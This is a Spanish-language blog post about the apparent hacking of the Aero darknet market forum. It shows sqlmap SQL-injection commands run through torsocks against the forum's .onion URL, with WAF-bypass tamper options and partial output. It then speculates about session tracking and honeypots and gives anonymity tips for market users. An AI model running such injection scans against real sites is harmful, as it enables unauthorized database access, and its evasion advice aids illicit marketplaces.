Darknet Market trick or surprise!

La privacidad es lo basico para tener seguridad ,




Aero es una maket que ha sido supuestamente hackeada y comprometida revelando informacion  de sus miembros ,

informacion aqui | https://www.deepdotweb.com/2017/12/05/5-12-17-dark-web-cybercrime-roundup/  pero como fue posible el ataque

Aero Vulnerable a SQL

torsocks sqlmap -u "http:// aerotalkgv5loftn. onion/viewtopic.php?id=1650" --level 5 --risk 3 --time-sec=10 --identify-waf --drop-set-cookie 

[17:52:53] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
[17:54:48] [INFO] target URL is stable
[17:54:48] [INFO] testing if GET parameter 'id' is dynamic
[17:54:56] [INFO] confirming that GET parameter 'id' is dynamic

torsocks sqlmap -u "http:// aerotalkgv5loftn. onion/viewtopic.php?id=1650" --level 5 --risk 3 --time-sec=10 --identify-waf --drop-set-cookie --keep-alive --random-agent --tamper= ???

Lista de tampers y bypass waf ! https: //www. 2cto. com/article/201502/374877.html
 
Cabe señalar que AERO tiene varias modificaciones de abcess meses atras posiblemente
estaba a punto de ser una OPSEC
Una ves observando que es vulnerable y las DBS no tienen nada interesante , vemos la participacion que tiene el chico que insulto al administrador








Nos registramos normalmente pero notaremos algo / Advanced cada minuto cambiara de agent para no tener una actividad estatica. 



Parece ser un tracker , cada ves que cambia el agent , nos cierra la seccion al forum
esto es una alerta ! session tracker!
Para estar seguros de un tracker o una trampa , como funcionara la plataforma cambiando a identidad estatica .




Tails y Tor browser es una identidad estatica ! nos convertimos en una y provaremos el foro !


Al ser una Identidad estatica el foro no me saco de su seccion . 

Estructura
Agora forum > Login > activity forum
Advanced persistent
Agora forum > Login > activity forum > random agent > no capture information > logout
Tails / Tor Browser
Agora Forum > Login > activity forum
Practicamente es un tracker , donde el usuario se entrega al administrador y posiblemente sea una OPSEC , toda tu actividad guardada ,
Como funciona un tracker /
Honeypot > Agora forum > login > activity users
OPSEC > Honeypot > Agora Forum > Login > Activity users > detected Tails / Tor bundle
OPSEC > Honeypot > Agora Forum > Login > Activity users > Tracker > Tails /Tor Bundle > CPU , GPU , and others 

De esta forma tu deanonymization sera eficaz
Advanced Denegara todo este tipo de actividad por seguridad del usuario y distribucion!
Puerto IDS reportado / 45478 / 39742 .
Tips! Una market no debe de guardar registros . y permitir al usuario cambio de string o agent
constante para mayor seguridad de sus usuarios @OPSEC FAIL


Comentarios

Entradas más populares de este blog

Module Intelligence Unknown

Unknown_1.0